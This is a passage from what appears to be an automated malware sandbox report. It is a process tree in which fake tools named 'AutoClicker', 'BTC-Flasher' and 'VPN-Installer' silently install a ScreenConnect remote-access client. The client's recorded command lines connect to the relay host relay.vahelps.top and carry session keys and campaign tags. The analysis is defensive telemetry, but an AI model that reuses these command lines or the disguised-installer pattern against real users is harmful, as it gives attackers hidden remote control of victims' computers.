                                                  • System Location Discovery: System Language Discovery
                                                  PID:1740
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 2768315ABA567584EAF240F4AFC1A088 C
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3056
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI88F1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241338671 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5116
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding FEEA12BC835B17E2AD65B7C8798CE3AF
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2604
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 2F42ED5C44A32EA13B385C84E3F86E24 E Global\MSI0000
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1056
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 26B8DDF1ED94A63CE5B26EE23F81610F C
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1792
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241487796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2920
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 534679E3EBFC08C3DC704D3B0233A5D1
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2984
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 59D8D72F1287F91E0BE7C7C04C28CA83 C
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:396
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI16EF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241506109 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3024
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding C418B454B32A423B899570F451D93DD4
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1244
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 1E80FE38758CB1456AB64F2E6DB7A23D E Global\MSI0000
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:604
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Checks SCSI registry key(s)
                                                PID:3792
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&t=FREE_VPN"
                                                1⤵
                                                • Sets service image path in registry
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of WriteProcessMemory
                                                PID:3116
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "12337850-2b3d-4843-a4e9-32eb8a58f012" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:468
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=AUTOCLICKER"
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of WriteProcessMemory
                                                PID:1408
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "74267e91-e11f-4f86-a437-bf8e66deae5a" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:568
                                              • C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:1028
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2408
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=BTC-FLASHER"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:2976
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "27f58587-14d5-42fd-bfbb-98030a75155c" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4848
                                              • C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:980
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:840
                                              • C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:5020
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4132
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:4692
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "5fb28501-c747-48d3-ac4b-586971fcfd21" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:764
                                              • C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
                                                "C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
                                                1⤵
                                                  PID:4768
                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                  1⤵
                                                    PID:1416
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:2320
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                      1⤵
                                                        PID:1612
                                                      • C:\Windows\system32\msiexec.exe
                                                        C:\Windows\system32\msiexec.exe /V
                                                        1⤵
                                                        • Enumerates connected drives
                                                        • Boot or Logon Autostart Execution: Authentication Package
                                                        • Drops file in Program Files directory
                                                        • Drops file in Windows directory
                                                        • Modifies data under HKEY_USERS
                                                        • Modifies registry class
                                                        PID:4048
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding E7EE87381CB21AA8F6ED4A84B58BFC33 C
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3120
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIF3C8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242349093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2744
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 501C26F1CE30D7B554A79751F99BB4EE
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4992
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 61A8950CFA1EEDB446376A3DD14F3157 E Global\MSI0000
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3692
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8F1D51CFCAEC926228398F458DDE36A1 C
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2480
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242385015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4328
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding F1388A9BCDC3D64ED9DD91AC684C718E
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:904
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                          PID:2532
                                                        • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                          "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjx